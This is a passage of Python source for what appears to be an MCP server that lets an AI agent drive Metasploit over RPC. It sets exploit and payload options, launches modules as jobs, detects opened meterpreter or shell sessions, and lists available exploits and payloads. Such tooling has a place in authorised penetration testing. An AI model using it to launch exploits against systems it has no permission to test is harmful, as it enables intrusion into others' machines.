48 | RPC_CALL_TIMEOUT = 30 # Default timeout for RPC calls like listing modules
49 |
50 | # Regular Expressions for Prompt Detection
51 | MSF_PROMPT_RE = re.compile(rb'\x01\x02msf\d+\x01\x02 \x01\x02> \x01\x02') # Matches the msf6 > prompt with control chars
52 | SHELL_PROMPT_RE = re.compile(r'([#$>]|%)\s*$') # Matches common shell prompts (#, $, >, %) at end of line
53 |
54 | # --- Metasploit Client Setup ---
55 |
56 | _msf_client_instance: Optional[MsfRpcClient] = None
57 |
58 | def initialize_msf_client() -> MsfRpcClient:
59 | """
60 | Initializes the global Metasploit RPC client instance.
61 | Raises exceptions on failure.
62 | """
63 | global _msf_client_instance
64 | if _msf_client_instance is not None:
65 | return _msf_client_instance
66 |
67 | logger.info("Attempting to initialize Metasploit RPC client...")
68 |
69 | try:
70 | msf_port = int(MSF_PORT_STR)
71 | msf_ssl = MSF_SSL_STR.lower() == 'true'
72 | except ValueError as e:
73 | logger.error(f"Invalid MSF connection parameters (PORT: {MSF_PORT_STR}, SSL: {MSF_SSL_STR}). Error: {e}")
74 | raise ValueError("Invalid MSF connection parameters") from e
75 |
76 | try:
77 | logger.debug(f"Attempting to create MsfRpcClient connection to {MSF_SERVER}:{msf_port} (SSL: {msf_ssl})...")
78 | client = MsfRpcClient(
79 | password=MSF_PASSWORD,
80 | server=MSF_SERVER,
81 | port=msf_port,
82 | ssl=msf_ssl
83 | )
84 | # Test connection during initialization
85 | logger.debug("Testing connection with core.version call...")
86 | version_info = client.core.version
87 | msf_version = version_info.get('version', 'unknown') if isinstance(version_info, dict) else 'unknown'
88 | logger.info(f"Successfully connected to Metasploit RPC at {MSF_SERVER}:{msf_port} (SSL: {msf_ssl}), version: {msf_version}")
89 | _msf_client_instance = client
90 | return _msf_client_instance
91 | except MsfRpcError as e:
92 | logger.error(f"Failed to connect or authenticate to Metasploit RPC ({MSF_SERVER}:{msf_port}, SSL: {msf_ssl}): {e}")
93 | raise ConnectionError(f"Failed to connect/authenticate to Metasploit RPC: {e}") from e
94 | except Exception as e:
95 | logger.error(f"An unexpected error occurred during MSF client initialization: {e}", exc_info=True)
96 | raise RuntimeError(f"Unexpected error initializing MSF client: {e}") from e
97 |
98 | def get_msf_client() -> MsfRpcClient:
99 | """Gets the initialized MSF client instance, raising an error if not ready."""
100 | if _msf_client_instance is None:
101 | logger.error("Metasploit client has not been initialized. Check MSF server connection.")
102 | raise ConnectionError("Metasploit client has not been initialized.") # Strict check preferred
103 | logger.debug("Retrieved MSF client instance successfully.")
104 | return _msf_client_instance
105 |
106 | async def check_msf_connection() -> Dict[str, Any]:
107 | """
108 | Check the current status of the Metasploit RPC connection.
109 | Returns connection status information for debugging.
110 | """
111 | try:
112 | client = get_msf_client()
113 | logger.debug(f"Testing MSF connection with {RPC_CALL_TIMEOUT}s timeout...")
114 | version_info = await asyncio.wait_for(
115 | asyncio.to_thread(lambda: client.core.version),
116 | timeout=RPC_CALL_TIMEOUT
117 | )
118 | msf_version = version_info.get('version', 'N/A') if isinstance(version_info, dict) else 'N/A'
119 | return {
120 | "status": "connected",
121 | "server": f"{MSF_SERVER}:{MSF_PORT_STR}",
122 | "ssl": MSF_SSL_STR,
123 | "version": msf_version,
124 | "message": "Connection to Metasploit RPC is healthy"
125 | }
126 | except asyncio.TimeoutError:
127 | return {
128 | "status": "timeout",
129 | "server": f"{MSF_SERVER}:{MSF_PORT_STR}",
130 | "ssl": MSF_SSL_STR,
131 | "timeout_seconds": RPC_CALL_TIMEOUT,
132 | "message": f"Metasploit server not responding within {RPC_CALL_TIMEOUT}s timeout"
133 | }
134 | except ConnectionError as e:
135 | return {
136 | "status": "not_initialized",
137 | "server": f"{MSF_SERVER}:{MSF_PORT_STR}",
138 | "ssl": MSF_SSL_STR,
139 | "message": f"Metasploit client not initialized: {e}"
140 | }
141 | except MsfRpcError as e:
142 | return {
143 | "status": "rpc_error",
144 | "server": f"{MSF_SERVER}:{MSF_PORT_STR}",
145 | "ssl": MSF_SSL_STR,
146 | "message": f"Metasploit RPC error: {e}"
147 | }
148 | except Exception as e:
149 | return {
150 | "status": "error",
151 | "server": f"{MSF_SERVER}:{MSF_PORT_STR}",
152 | "ssl": MSF_SSL_STR,
153 | "message": f"Unexpected error: {e}"
154 | }
155 |
156 | @contextlib.asynccontextmanager
157 | async def get_msf_console() -> MsfConsole:
158 | """
159 | Async context manager for creating and reliably destroying an MSF console.
160 | """
161 | client = get_msf_client() # Raises ConnectionError if not initialized
162 | console_object: Optional[MsfConsole] = None
163 | console_id_str: Optional[str] = None
164 | try:
165 | logger.debug("Creating temporary MSF console...")
166 | # Create console object directly
167 | console_object = await asyncio.to_thread(lambda: client.consoles.console())
168 |
169 | # Get ID using .cid attribute
170 | if isinstance(console_object, MsfConsole) and hasattr(console_object, 'cid'):
171 | console_id_val = getattr(console_object, 'cid')
172 | console_id_str = str(console_id_val) if console_id_val is not None else None
173 | if not console_id_str:
174 | raise ValueError("Console object created, but .cid attribute is empty or None.")
175 | logger.info(f"MSF console created (ID: {console_id_str})")
176 |
177 | # Read initial prompt/banner to clear buffer and ensure readiness
178 | await asyncio.sleep(0.2) # Short delay for prompt to appear
179 | initial_read = await asyncio.to_thread(lambda: console_object.read())
180 | logger.debug(f"Initial console read (clearing buffer): {initial_read}")
181 | yield console_object # Yield the ready console object
182 | else:
183 | # This case should ideally not happen if .console() works as expected
184 | logger.error(f"client.consoles.console() did not return expected MsfConsole object with .cid. Got type: {type(console_object)}")
185 | raise MsfRpcError(f"Unexpected result from console creation: {console_object}")
186 |
187 | except MsfRpcError as e:
188 | logger.error(f"MsfRpcError during console operation: {e}")
189 | raise MsfRpcError(f"Error creating/accessing MSF console: {e}") from e
190 | except Exception as e:
191 | logger.exception("Unexpected error during console creation/setup")
192 | raise RuntimeError(f"Unexpected error during console operation: {e}") from e
193 | finally:
194 | # Destruction Logic
195 | if console_id_str and _msf_client_instance: # Check client still exists
196 | try:
197 | logger.info(f"Attempting to destroy Metasploit console (ID: {console_id_str})...")
198 | # Use lambda to avoid potential issues with capture
199 | destroy_result = await asyncio.to_thread(
200 | lambda cid=console_id_str: _msf_client_instance.consoles.destroy(cid)
201 | )
202 | logger.debug(f"Console destroy result: {destroy_result}")
203 | except Exception as e:
204 | # Log error but don't raise exception during cleanup
205 | logger.error(f"Error destroying MSF console {console_id_str}: {e}")
206 | elif console_object and not console_id_str:
207 | logger.warning("Console object created but no valid ID obtained, cannot explicitly destroy.")
208 | # else: logger.debug("No console ID obtained, skipping destruction.")
209 |
210 | async def run_command_safely(console: MsfConsole, cmd: str, execution_timeout: Optional[int] = None) -> str:
211 | """
212 | Safely run a command on a Metasploit console and return the output.
213 | Relies primarily on detecting the MSF prompt for command completion.
214 |
215 | Args:
216 | console: The Metasploit console object (MsfConsole).
217 | cmd: The command to run.
218 | execution_timeout: Optional specific timeout for this command's execution phase.
219 |
220 | Returns:
221 | The command output as a string.
222 | """
223 | if not (hasattr(console, 'write') and hasattr(console, 'read')):
224 | logger.error(f"Console object {type(console)} lacks required methods (write, read).")
225 | raise TypeError("Unsupported console object type for command execution.")
226 |
227 | try:
228 | logger.debug(f"Running console command: {cmd}")
229 | await asyncio.to_thread(lambda: console.write(cmd + '\n'))
230 |
231 | output_buffer = b"" # Read as bytes to handle potential encoding issues and prompt matching
232 | start_time = asyncio.get_event_loop().time()
233 |
234 | # Determine read timeout - use inactivity timeout as fallback
235 | read_timeout = execution_timeout or (LONG_CONSOLE_READ_TIMEOUT if cmd.strip().startswith(("run", "exploit", "check")) else DEFAULT_CONSOLE_READ_TIMEOUT)
236 | check_interval = 0.1 # Seconds between reads
237 | last_data_time = start_time
238 |
239 | while True:
240 | await asyncio.sleep(check_interval)
241 | current_time = asyncio.get_event_loop().time()
242 |
243 | # Check overall timeout first
244 | if (current_time - start_time) > read_timeout:
245 | logger.warning(f"Overall timeout ({read_timeout}s) reached for console command '{cmd}'.")
246 | break
247 |
248 | # Read available data
249 | try:
250 | chunk_result = await asyncio.to_thread(lambda: console.read())
251 | # console.read() returns {'data': '...', 'prompt': '...', 'busy': bool}
252 | chunk_data = chunk_result.get('data', '').encode('utf-8', errors='replace') # Ensure bytes
253 |
254 | # Handle the prompt - ensure it's bytes for pattern matching
255 | prompt_str = chunk_result.get('prompt', '')
256 | prompt_bytes = prompt_str.encode('utf-8', errors='replace') if isinstance(prompt_str, str) else prompt_str
257 | except Exception as read_err:
258 | logger.warning(f"Error reading from console during command '{cmd}': {read_err}")
259 | await asyncio.sleep(0.5) # Wait a bit before retrying or timing out
260 | continue
261 |
262 | if chunk_data:
263 | # logger.debug(f"Read chunk (bytes): {chunk_data[:100]}...") # Log sparingly
264 | output_buffer += chunk_data
265 | last_data_time = current_time # Reset inactivity timer
266 |
267 | # Primary Completion Check: Did we receive the prompt?
268 | if prompt_bytes and MSF_PROMPT_RE.search(prompt_bytes):
269 | logger.debug(f"Detected MSF prompt in console.read() result for '{cmd}'. Command likely complete.")
270 | break
271 | # Secondary Check: Does the buffered output end with the prompt?
272 | # Needed if prompt wasn't in the last read chunk but arrived earlier.
273 | if MSF_PROMPT_RE.search(output_buffer):
274 | logger.debug(f"Detected MSF prompt at end of buffer for '{cmd}'. Command likely complete.")
275 | break
276 |
277 | # Fallback Completion Check: Inactivity timeout
278 | elif (current_time - last_data_time) > SESSION_READ_INACTIVITY_TIMEOUT: # Use a shorter inactivity timeout here
279 | logger.debug(f"Console inactivity timeout ({SESSION_READ_INACTIVITY_TIMEOUT}s) reached for command '{cmd}'. Assuming complete.")
280 | break
281 |
282 | # Decode the final buffer
283 | final_output = output_buffer.decode('utf-8', errors='replace').strip()
284 | logger.debug(f"Final output for '{cmd}' (length {len(final_output)}):\n{final_output[:500]}{'...' if len(final_output) > 500 else ''}")
285 | return final_output
286 |
287 | except Exception as e:
288 | logger.exception(f"Error executing console command '{cmd}'")
289 | raise RuntimeError(f"Failed executing console command '{cmd}': {e}") from e
290 |
291 | from mcp.server.session import ServerSession
292 |
293 | ####################################################################################
294 | # Temporary monkeypatch which avoids crashing when a POST message is received
295 | # before a connection has been initialized, e.g: after a deployment.
296 | # pylint: disable-next=protected-access
297 | old__received_request = ServerSession._received_request
298 |
299 |
300 | async def _received_request(self, *args, **kwargs):
301 | try:
302 | return await old__received_request(self, *args, **kwargs)
303 | except RuntimeError:
304 | pass
305 |
306 |
307 | # pylint: disable-next=protected-access
308 | ServerSession._received_request = _received_request
309 | ####################################################################################
310 |
311 | # --- MCP Server Initialization ---
312 | mcp = FastMCP("Metasploit Tools Enhanced (Streamlined)")
313 |
314 | # --- Internal Helper Functions ---
315 |
316 | def _parse_options_gracefully(options: Union[Dict[str, Any], str, None]) -> Dict[str, Any]:
317 | """
318 | Gracefully parse options from different formats.
319 |
320 | Handles:
321 | - Dict format (correct): {"key": "value", "key2": "value2"}
322 | - String format (common mistake): "key=value,key=value"
323 | - None: returns empty dict
324 |
325 | Args:
326 | options: Options in dict format, string format, or None
327 |
328 | Returns:
329 | Dictionary of parsed options
330 |
331 | Raises:
332 | ValueError: If string format is malformed
333 | """
334 | if options is None:
335 | return {}
336 |
337 | if isinstance(options, dict):
338 | # Already correct format
339 | return options
340 |
341 | if isinstance(options, str):
342 | # Handle the common mistake format: "key=value,key=value"
343 | if not options.strip():
344 | return {}
345 |
346 | logger.info(f"Converting string format options to dict: {options}")
347 | parsed_options = {}
348 |
349 | try:
350 | # Split by comma and then by equals
351 | pairs = [pair.strip() for pair in options.split(',') if pair.strip()]
352 | for pair in pairs:
353 | if '=' not in pair:
354 | raise ValueError(f"Invalid option format: '{pair}' (missing '=')")
355 |
356 | key, value = pair.split('=', 1) # Split only on first '='
357 | key = key.strip()
358 | value = value.strip()
359 |
360 | # Validate key is not empty
361 | if not key:
362 | raise ValueError(f"Invalid option format: '{pair}' (empty key)")
363 |
364 | # Remove quotes if they wrap the entire value
365 | if (value.startswith('"') and value.endswith('"')) or \
366 | (value.startswith("'") and value.endswith("'")):
367 | value = value[1:-1]
368 |
369 | # Basic type conversion
370 | if value.lower() in ('true', 'false'):
371 | value = value.lower() == 'true'
372 | elif value.isdigit():
373 | try:
374 | value = int(value)
375 | except ValueError:
376 | pass # Keep as string if conversion fails
377 |
378 | parsed_options[key] = value
379 |
380 | logger.info(f"Successfully converted string options to dict: {parsed_options}")
381 | return parsed_options
382 |
383 | except Exception as e:
384 | raise ValueError(f"Failed to parse options string '{options}': {e}. Expected format: 'key=value,key2=value2' or dict {{'key': 'value'}}")
385 |
386 | # For any other type, try to convert to dict
387 | try:
388 | return dict(options)
389 | except (TypeError, ValueError) as e:
390 | raise ValueError(f"Options must be a dictionary or comma-separated string format 'key=value,key2=value2'. Got {type(options)}: {options}")
391 |
392 | async def _get_module_object(module_type: str, module_name: str) -> Any:
393 | """Gets the MSF module object, handling potential path variations."""
394 | client = get_msf_client()
395 | base_module_name = module_name # Start assuming it's the base name
396 | if '/' in module_name:
397 | parts = module_name.split('/')
398 | if parts[0] in ('exploit', 'payload', 'post', 'auxiliary', 'encoder', 'nop'):
399 | # Looks like full path, extract base name
400 | base_module_name = '/'.join(parts[1:])
401 | if module_type != parts[0]:
402 | logger.warning(f"Module type mismatch: expected '{module_type}', got path starting with '{parts[0]}'. Using provided type.")
403 | # Else: Assume it's like 'windows/smb/ms17_010_eternalblue' - already the base name
404 |
405 | logger.debug(f"Attempting to retrieve module: client.modules.use('{module_type}', '{base_module_name}')")
406 | try:
407 | module_obj = await asyncio.to_thread(lambda: client.modules.use(module_type, base_module_name))
408 | logger.debug(f"Successfully retrieved module object for {module_type}/{base_module_name}")
409 | return module_obj
410 | except (MsfRpcError, KeyError) as e:
411 | # KeyError can be raised by pymetasploit3 if module not found
412 | error_str = str(e).lower()
413 | if "unknown module" in error_str or "invalid module" in error_str or isinstance(e, KeyError):
414 | logger.error(f"Module {module_type}/{base_module_name} (from input {module_name}) not found.")
415 | raise ValueError(f"Module '{module_name}' of type '{module_type}' not found.") from e
416 | else:
417 | logger.error(f"MsfRpcError getting module {module_type}/{base_module_name}: {e}")
418 | raise MsfRpcError(f"Error retrieving module '{module_name}': {e}") from e
419 |
420 | async def _set_module_options(module_obj: Any, options: Dict[str, Any]):
421 | """Sets options on a module object, performing basic type guessing."""
422 | logger.debug(f"Setting options for module {getattr(module_obj, 'fullname', '')}: {options}")
423 | for k, v in options.items():
424 | # Basic type guessing
425 | original_value = v
426 | if isinstance(v, str):
427 | if v.isdigit():
428 | try: v = int(v)
429 | except ValueError: pass # Keep as string if large number or non-integer
430 | elif v.lower() in ('true', 'false'):
431 | v = v.lower() == 'true'
432 | # Add more specific checks if needed (e.g., for file paths)
433 | elif isinstance(v, (int, bool)):
434 | pass # Already correct type
435 | # Add handling for other types like lists if necessary
436 |
437 | try:
438 | # Use lambda to capture current k, v for the thread
439 | await asyncio.to_thread(lambda key=k, value=v: module_obj.__setitem__(key, value))
440 | # logger.debug(f"Set option {k}={v} (original: {original_value})")
441 | except (MsfRpcError, KeyError, TypeError) as e:
442 | # Catch potential errors if option doesn't exist or type is wrong
443 | logger.error(f"Failed to set option {k}={v} on module: {e}")
444 | raise ValueError(f"Failed to set option '{k}' to '{original_value}': {e}") from e
445 |
446 | async def _execute_module_rpc(
447 | module_type: str,
448 | module_name: str, # Can be full path or base name
449 | module_options: Dict[str, Any],
450 | payload_spec: Optional[Union[str, Dict[str, Any]]] = None # Payload name or {name: ..., options: ...}
451 | ) -> Dict[str, Any]:
452 | """
453 | Helper to execute an exploit, auxiliary, or post module as a background job via RPC.
454 | Includes polling logic for exploit sessions.
455 | """
456 | client = get_msf_client()
457 | module_obj = await _get_module_object(module_type, module_name) # Handles path variants
458 | full_module_path = getattr(module_obj, 'fullname', f"{module_type}/{module_name}") # Get canonical name
459 |
460 | await _set_module_options(module_obj, module_options)
461 |
462 | payload_obj_to_pass = None
463 | payload_name_for_log = None
464 | payload_options_for_log = None
465 |
466 | # Prepare payload if needed (primarily for exploits, also used by start_listener)
467 | if module_type == 'exploit' and payload_spec:
468 | if isinstance(payload_spec, str):
469 | payload_name_for_log = payload_spec
470 | # Passing name string directly is supported by exploit.execute
471 | payload_obj_to_pass = payload_name_for_log
472 | logger.info(f"Executing {full_module_path} with payload '{payload_name_for_log}' (passed as string).")
473 | elif isinstance(payload_spec, dict) and 'name' in payload_spec:
474 | payload_name = payload_spec['name']
475 | payload_options = payload_spec.get('options', {})
476 | payload_name_for_log = payload_name
477 | payload_options_for_log = payload_options
478 | try:
479 | payload_obj = await _get_module_object('payload', payload_name)
480 | await _set_module_options(payload_obj, payload_options)
481 | payload_obj_to_pass = payload_obj # Pass the configured payload object
482 | logger.info(f"Executing {full_module_path} with configured payload object for '{payload_name}'.")
483 | except (ValueError, MsfRpcError) as e:
484 | logger.error(f"Failed to prepare payload object for '{payload_name}': {e}")
485 | return {"status": "error", "message": f"Failed to prepare payload '{payload_name}': {e}"}
486 | else:
487 | logger.warning(f"Invalid payload_spec format: {payload_spec}. Expected string or dict with 'name'.")
488 | return {"status": "error", "message": "Invalid payload specification format."}
489 |
490 | logger.info(f"Executing module {full_module_path} as background job via RPC...")
491 | try:
492 | if module_type == 'exploit':
493 | exec_result = await asyncio.to_thread(lambda: module_obj.execute(payload=payload_obj_to_pass))
494 | else: # auxiliary, post
495 | exec_result = await asyncio.to_thread(lambda: module_obj.execute())
496 |
497 | logger.info(f"RPC execute() result for {full_module_path}: {exec_result}")
498 |
499 | # --- Process Execution Result ---
500 | if not isinstance(exec_result, dict):
501 | logger.error(f"Unexpected result type from {module_type} execution: {type(exec_result)} - {exec_result}")
502 | return {"status": "error", "message": f"Unexpected result from module execution: {exec_result}", "module": full_module_path}
503 |
504 | if exec_result.get('error', False):
505 | error_msg = exec_result.get('error_message', exec_result.get('error_string', 'Unknown RPC error during execution'))
506 | logger.error(f"Failed to start job for {full_module_path}: {error_msg}")
507 | # Check for common errors
508 | if "could not bind" in error_msg.lower():
509 | return {"status": "error", "message": f"Job start failed: Address/Port likely already in use. {error_msg}", "module": full_module_path}
510 | return {"status": "error", "message": f"Failed to start job: {error_msg}", "module": full_module_path}
511 |
512 | job_id = exec_result.get('job_id')
513 | uuid = exec_result.get('uuid')
514 |
515 | if job_id is None:
516 | logger.warning(f"{module_type.capitalize()} job executed but no job_id returned: {exec_result}")
517 | # Sometimes handlers don't return job_id but are running, check by UUID/name later maybe
518 | if module_type == 'exploit' and 'handler' in full_module_path:
519 | # Check jobs list for a match based on payload/lhost/lport
520 | await asyncio.sleep(1.0)
521 | jobs_list = await asyncio.to_thread(lambda: client.jobs.list)
522 | for jid, jinfo in jobs_list.items():
523 | if isinstance(jinfo, dict) and jinfo.get('name','').endswith('Handler') and \
524 | jinfo.get('datastore',{}).get('LHOST') == module_options.get('LHOST') and \
525 | jinfo.get('datastore',{}).get('LPORT') == module_options.get('LPORT') and \
526 | jinfo.get('datastore',{}).get('PAYLOAD') == payload_name_for_log:
527 | logger.info(f"Found probable handler job {jid} matching parameters.")
528 | return {"status": "success", "message": f"Listener likely started as job {jid}", "job_id": jid, "uuid": uuid, "module": full_module_path}
529 |
530 | return {"status": "unknown", "message": f"{module_type.capitalize()} executed, but no job ID returned.", "result": exec_result, "module": full_module_path}
531 |
532 | # --- Exploit Specific: Poll for Session ---
533 | found_session_id = None
534 | if module_type == 'exploit' and uuid:
535 | start_time = asyncio.get_event_loop().time()
536 | logger.info(f"Exploit job {job_id} (UUID: {uuid}) started. Polling for session (timeout: {EXPLOIT_SESSION_POLL_TIMEOUT}s)...")
537 | while (asyncio.get_event_loop().time() - start_time) < EXPLOIT_SESSION_POLL_TIMEOUT:
538 | try:
539 | sessions_list = await asyncio.to_thread(lambda: client.sessions.list)
540 | for s_id, s_info in sessions_list.items():
541 | # Ensure comparison is robust (uuid might be str or bytes, info dict keys too)
542 | s_id_str = str(s_id)
543 | if isinstance(s_info, dict) and str(s_info.get('exploit_uuid')) == str(uuid):
544 | found_session_id = s_id # Keep original type from list keys
545 | logger.info(f"Found matching session {found_session_id} for job {job_id} (UUID: {uuid})")
546 | break # Exit inner loop
547 |
548 | if found_session_id is not None: break # Exit outer loop
549 |
550 | # Optional: Check if job died prematurely
551 | # job_info = await asyncio.to_thread(lambda: client.jobs.info(str(job_id)))
552 | # if not job_info or job_info.get('status') != 'running':
553 | # logger.warning(f"Job {job_id} stopped or disappeared during session polling.")
554 | # break
555 |
556 | except MsfRpcError as poll_e: logger.warning(f"Error during session polling: {poll_e}")
557 | except Exception as poll_e: logger.error(f"Unexpected error during polling: {poll_e}", exc_info=True); break
558 |
559 | await asyncio.sleep(EXPLOIT_SESSION_POLL_INTERVAL)
560 |
561 | if found_session_id is None:
562 | logger.warning(f"Polling timeout ({EXPLOIT_SESSION_POLL_TIMEOUT}s) reached for job {job_id}, no matching session found.")
563 |
564 | # --- Construct Final Success/Warning Message ---
565 | message = f"{module_type.capitalize()} module {full_module_path} started as job {job_id}."
566 | status = "success"
567 | if module_type == 'exploit':
568 | if found_session_id is not None:
569 | message += f" Session {found_session_id} created."
570 | else:
571 | message += " No session detected within timeout."
572 | status = "warning" # Indicate job started but session didn't appear
573 |
574 | return {
575 | "status": status, "message": message, "job_id": job_id, "uuid": uuid,
576 | "session_id": found_session_id, # None if not found/not applicable
577 | "module": full_module_path, "options": module_options,
578 | "payload_name": payload_name_for_log, # Include payload info if exploit
579 | "payload_options": payload_options_for_log
580 | }
581 |
582 | except (MsfRpcError, ValueError) as e: # Catch module prep errors too
583 | error_str = str(e).lower()
584 | logger.error(f"Error executing module {full_module_path} via RPC: {e}")
585 | if "missing required option" in error_str or "invalid option" in error_str:
586 | missing = getattr(module_obj, 'missing_required', [])
587 | return {"status": "error", "message": f"Missing/invalid options for {full_module_path}: {e}", "missing_required": missing}
588 | elif "invalid payload" in error_str:
589 | return {"status": "error", "message": f"Invalid payload specified: {payload_name_for_log or 'None'}. {e}"}
590 | return {"status": "error", "message": f"Error running {full_module_path}: {e}"}
591 | except Exception as e:
592 | logger.exception(f"Unexpected error executing module {full_module_path} via RPC")
593 | return {"status": "error", "message": f"Unexpected server error running {full_module_path}: {e}"}
594 |
595 | async def _execute_module_console(
596 | module_type: str,
597 | module_name: str, # Can be full path or base name
598 | module_options: Dict[str, Any],
599 | command: str, # Typically 'exploit', 'run', or 'check'
600 | payload_spec: Optional[Union[str, Dict[str, Any]]] = None,
601 | timeout: int = LONG_CONSOLE_READ_TIMEOUT
602 | ) -> Dict[str, Any]:
603 | """Helper to execute a module synchronously via console."""
604 | # Determine full path needed for 'use' command
605 | if '/' not in module_name:
606 | full_module_path = f"{module_type}/{module_name}"
607 | else:
608 | # Assume full path or relative path was given; ensure type prefix
609 | if not module_name.startswith(module_type + '/'):
610 | # e.g., got 'windows/x', type 'exploit' -> 'exploit/windows/x'
611 | # e.g., got 'exploit/windows/x', type 'exploit' -> 'exploit/windows/x' (no change)
612 | if not any(module_name.startswith(pfx + '/') for pfx in ['exploit', 'payload', 'post', 'auxiliary', 'encoder', 'nop']):
613 | full_module_path = f"{module_type}/{module_name}"
614 | else: # Already has a type prefix, use it as is
615 | full_module_path = module_name
616 | else: # Starts with correct type prefix
617 | full_module_path = module_name
618 |
619 | logger.info(f"Executing {full_module_path} synchronously via console (command: {command})...")
620 |
621 | payload_name_for_log = None
622 | payload_options_for_log = None
623 |
624 | async with get_msf_console() as console:
625 | try:
626 | setup_commands = [f"use {full_module_path}"]
627 |
628 | # Add module options
629 | for key, value in module_options.items():
630 | val_str = str(value)
631 | if isinstance(value, str) and any(c in val_str for c in [' ', '"', "'", '\\']):
632 | val_str = shlex.quote(val_str)
633 | elif isinstance(value, bool):
634 | val_str = str(value).lower() # MSF console expects lowercase bools
635 | setup_commands.append(f"set {key} {val_str}")
636 |
637 | # Add payload and payload options (if applicable)
638 | if payload_spec:
639 | payload_name = None
640 | payload_options = {}
641 | if isinstance(payload_spec, str):
642 | payload_name = payload_spec
643 | elif isinstance(payload_spec, dict) and 'name' in payload_spec:
644 | payload_name = payload_spec['name']
645 | payload_options = payload_spec.get('options', {})
646 |
647 | if payload_name:
648 | payload_name_for_log = payload_name
649 | payload_options_for_log = payload_options
650 | # Need base name for 'set PAYLOAD'
651 | if '/' in payload_name:
652 | parts = payload_name.split('/')
653 | if parts[0] == 'payload': payload_base_name = '/'.join(parts[1:])
654 | else: payload_base_name = payload_name # Assume relative
655 | else: payload_base_name = payload_name # Assume just name
656 |
657 | setup_commands.append(f"set PAYLOAD {payload_base_name}")
658 | for key, value in payload_options.items():
659 | val_str = str(value)
660 | if isinstance(value, str) and any(c in val_str for c in [' ', '"', "'", '\\']):
661 | val_str = shlex.quote(val_str)
662 | elif isinstance(value, bool):
663 | val_str = str(value).lower()
664 | setup_commands.append(f"set {key} {val_str}")
665 |
666 | # Execute setup commands
667 | for cmd in setup_commands:
668 | setup_output = await run_command_safely(console, cmd, execution_timeout=DEFAULT_CONSOLE_READ_TIMEOUT)
669 | # Basic error check in setup output
670 | if any(err in setup_output for err in ["[-] Error setting", "Invalid option", "Unknown module", "Failed to load"]):
671 | error_msg = f"Error during setup command '{cmd}': {setup_output}"
672 | logger.error(error_msg)
673 | return {"status": "error", "message": error_msg, "module": full_module_path}
674 | await asyncio.sleep(0.1) # Small delay between setup commands
675 |
676 | # Execute the final command (exploit, run, check)
677 | logger.info(f"Running final console command: {command}")
678 | module_output = await run_command_safely(console, command, execution_timeout=timeout)
679 | logger.debug(f"Synchronous execution output length: {len(module_output)}")
680 |
681 | # --- Parse Console Output ---
682 | session_id = None
683 | session_opened_line = ""
684 | # More robust session detection pattern
685 | session_match = re.search(r"(?:meterpreter|command shell)\s+session\s+(\d+)\s+opened", module_output, re.IGNORECASE)
686 | if session_match:
687 | try:
688 | session_id = int(session_match.group(1))
689 | session_opened_line = session_match.group(0) # The matched line segment
690 | logger.info(f"Detected session {session_id} opened in console output.")
691 | except (ValueError, IndexError):
692 | logger.warning("Found session opened pattern, but failed to parse ID.")
693 |
694 | status = "success"
695 | message = f"{module_type.capitalize()} module {full_module_path} completed via console ({command})."
696 | if command in ['exploit', 'run'] and session_id is None and \
697 | any(term in module_output.lower() for term in ['session opened', 'sending stage']):
698 | message += " Session may have opened but ID detection failed or session closed quickly."
699 | status = "warning"
700 | elif command in ['exploit', 'run'] and session_id is not None:
701 | message += f" Session {session_id} detected."
702 |
703 | # Check for common failure indicators
704 | if any(fail in module_output.lower() for fail in ['exploit completed, but no session was created', 'exploit failed', 'run failed', 'check failed', 'module check failed']):
705 | status = "error" if status != "warning" else status # Don't override warning if session might have opened
706 | message = f"{module_type.capitalize()} module {full_module_path} execution via console appears to have failed. Check output."
707 | logger.error(f"Failure detected in console output for {full_module_path}.")
708 |
709 |
710 | return {
711 | "status": status,
712 | "message": message,
713 | "module_output": module_output,
714 | "session_id_detected": session_id,
715 | "session_opened_line": session_opened_line,
716 | "module": full_module_path,
717 | "options": module_options,
718 | "payload_name": payload_name_for_log,
719 | "payload_options": payload_options_for_log
720 | }
721 |
722 | except (RuntimeError, MsfRpcError, ValueError) as e: # Catch errors from run_command_safely or setup
723 | logger.error(f"Error during console execution of {full_module_path}: {e}")
724 | return {"status": "error", "message": f"Error executing {full_module_path} via console: {e}"}
725 | except Exception as e:
726 | logger.exception(f"Unexpected error during console execution of {full_module_path}")
727 | return {"status": "error", "message": f"Unexpected server error running {full_module_path} via console: {e}"}
728 |
729 | # --- MCP Tool Definitions ---
730 |
731 | @mcp.tool()
732 | async def list_exploits(search_term: str = "") -> List[str]:
733 | """
734 | List available Metasploit exploits, optionally filtered by search term.
735 |
736 | Args:
737 | search_term: Optional term to filter exploits (case-insensitive).
738 |
739 | Returns:
740 | List of exploit names matching the term (max 200), or top 100 if no term.
741 | """
742 | client = get_msf_client()
743 | logger.info(f"Listing exploits (search term: '{search_term or 'None'}')")
744 | try:
745 | # Add timeout to prevent hanging on slow/unresponsive MSF server
746 | logger.debug(f"Calling client.modules.exploits with {RPC_CALL_TIMEOUT}s timeout...")
747 | exploits = await asyncio.wait_for(
748 | asyncio.to_thread(lambda: client.modules.exploits),
749 | timeout=RPC_CALL_TIMEOUT
750 | )
751 | logger.debug(f"Retrieved {len(exploits)} total exploits from MSF.")
752 | if search_term:
753 | term_lower = search_term.lower()
754 | filtered_exploits = [e for e in exploits if term_lower in e.lower()]
755 | count = len(filtered_exploits)
756 | limit = 200
757 | logger.info(f"Found {count} exploits matching '{search_term}'. Returning max {limit}.")
758 | return filtered_exploits[:limit]
759 | else:
760 | limit = 100
761 | logger.info(f"No search term provided, returning first {limit} exploits.")
762 | return exploits[:limit]
763 | except asyncio.TimeoutError:
764 | error_msg = f"Timeout ({RPC_CALL_TIMEOUT}s) while listing exploits from Metasploit server. Server may be slow or unresponsive."
765 | logger.error(error_msg)
766 | return [f"Error: {error_msg}"]
767 | except MsfRpcError as e:
768 | logger.error(f"Metasploit RPC error while listing exploits: {e}")
769 | return [f"Error: Metasploit RPC error: {e}"]
770 | except Exception as e:
771 | logger.exception("Unexpected error listing exploits.")
772 | return [f"Error: Unexpected error listing exploits: {e}"]
773 |
774 | @mcp.tool()
775 | async def list_payloads(platform: str = "", arch: str = "") -> List[str]:
776 | """
777 | List available Metasploit payloads, optionally filtered by platform and/or architecture.
778 |
779 | Args:
780 | platform: Optional platform filter (e.g., 'windows', 'linux', 'python', 'php').
781 | arch: Optional architecture filter (e.g., 'x86', 'x64', 'cmd', 'meterpreter').
782 |
783 | Returns:
784 | List of payload names matching filters (max 100).
785 | """
786 | client = get_msf_client()
787 | logger.info(f"Listing payloads (platform: '{platform or 'Any'}', arch: '{arch or 'Any'}')")
788 | try:
789 | # Add timeout to prevent hanging on slow/unresponsive MSF server
